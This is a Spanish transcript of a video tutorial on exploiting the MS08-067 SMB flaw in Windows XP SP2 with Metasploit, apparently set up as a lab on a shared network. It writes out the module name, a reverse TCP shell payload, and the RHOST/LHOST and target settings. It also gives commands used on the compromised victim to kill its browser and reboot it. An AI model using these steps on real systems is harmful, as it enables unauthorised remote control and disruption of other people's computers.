Está en la página 1de 2

1 Vamos a usar Metasploit para explotar una vulnerabilidad

2 en Windows XP Service Pack 2. Entonces, suponemos que


3 la víctima ha instalado el Service Pack 2 de
4 Windows XP y el atacante ha instalado Ubuntu Linux 15.0.4.
5 Además, suponemos que tanto la víctima que es la que se situa
6 a la derecha como el atacante que está a la izquierda están
7 en la misma red. En Linux hemos abierto tres terminales, solo para
8 trabajar más rápido, y necesitamos comenzar haciendo
9 un análisis de red para identificar la IP, la dirección de la víctima.
10 Ahí vemos la red en la que estamos,
11 la dirección de la red, en este caso la del atacante.
12 Y ahora, vamos a usar Nmap para escanear la red. Utilizamos el parámetro
13 "O" para identificar la huella de todas las máquinas dentro de la red.
14 Aquí se presentan todas las máquinas que se han identificado.
15 Y ahora, necesitamos buscar aquellas que son vulnerables. Sabemos de antemano
16 que Windows XP Service Pack 2 tiene diferentes vulnerabilidades.
17 Particularmente, vamos a explotar una vulnerabilidad
18 en el Service Message Block Protocol (SMB). Este protocolo es
19 el que utiliza Windows para proporcionar archivos, impresoras,
20 puertos de serie y para comunicar información entre equipos.
21 Entonces, cuando hemos identificado la IP, aquí está la IP,
22 vamos a abrir Metasploit. Ejecutamos msfconsole.
23 Y ahora, una vez que Metasploit está abierto, necesitamos
24 utilizar un exploit. En este caso, vamos a utilizar un exploit
25 particularmente enfocado en SMB. Escribimos: exploit
26 use exploitsmbms08_067_netapi.
27 Algo ha sucedido, tal vez el nombre del exploit está mal...
28 Usamos el exploit adecuado y ahora tenemos que configurar el payload,
29 la carga útil. En este caso, vamos a establecer la carga
30 útil para obtener una shell, una shell inversa. Va a ser lo mismo
31 que si abro una terminal en la máquina de la víctima.
32 Entonces, una vez que establecemos el payload, windows/shell/reverse_tcp
33 Ahora hay que configurarlo.
34 En este caso, necesitamos especificar
35 el host remoto, RHOST, (Remote HOST) es decir, el de la víctima.
36 Luego el local host, que es el del atacante.
37 Así como algunas opciones más como por ejemplo, el objetivo
38 (el target) que lo especificamos después. En particular, el target
39 se refiere el sistema operativo de la víctima que es Windows
40 XP Service Pack 2 (pero de esto ya hablaremos).
41 En cuanto a los puertos, dejamos los puertos predeterminados, porque
42 445 es el puerto utilizado por el protocolo
43 SMB, y dejamos el puerto 4444 por
44 defecto, ya que es el del ordenador del atacante.
45 Entonces, establecemos RHOST, con la dirección IP de
46 la víctima y luego también establecemos, con el comando set, el
47 local host, la dirección IP del atacante.
48 Como no conozco la IP del atacante, pues simplemente, abro una
49 terminal y miro cuál es la IP de esta máquina.
50 Termina en 76. Una vez establecido esto vamos a
51 ver los targets, los objetivos, y seleccionamos el sistema
52 operativo correspondiente, en este caso, Windows XP
53 Service Pack 2 que se corresponde con el target 5.
54 Escribimos: set target 5. Ahora más o menos todo está hecho.
55 Ahora podemos verificar, opcionalmente, si el equipo de la víctima es
56 vulnerable.
57 Una vez que lo hemos comprobado y que parece que, realmente,
58 se puede explotar pues escribimos exploit.
59 ¡Si, esta funcionando! ¡Bien! Ahora estamos en la máquina de la víctima.
60 Ejecutamos dir...
61 Y se presentan todos los archivos y directorios de la víctima.
62 Además, podemos llegar a ver que la víctima
63 está navegando por Internet y el atacante puede decidir
64 cerrar el navegador, cerrar el proceso correspondiente con
65 el navegador. ¿Cómo? Pues hay un comando que es
66 taskkill/f /im iexplore.exe
67 que es el ejecutable del navegador internet explorer
68 en este caso. Y curiosamente el navegador se ha cerrado de repente
69 porque el atacante tiene el control de la máquina de la víctima.
70 Además, por ejemplo, el atacante puede apagar el ordenador de
71 la víctima. Podemos utilizar el comando shutdown -r.
72 En este caso, en 30 segundos el ordenador de la víctima
73 se reiniciará.
74 Ahora, ya sabes cómo funciona Metasploit. Hemos explotado
75 una vulnerabilidad en Windows XP. Pero la forma en la que
76 funciona Metasploit es más o menos similar, independientemente
77 del sistema operativo. Por lo tanto, no lo dudes, ¡instala distintas
78 máquinas virtuales y comienza a utilizar Metasploit!
79
80
81

También podría gustarte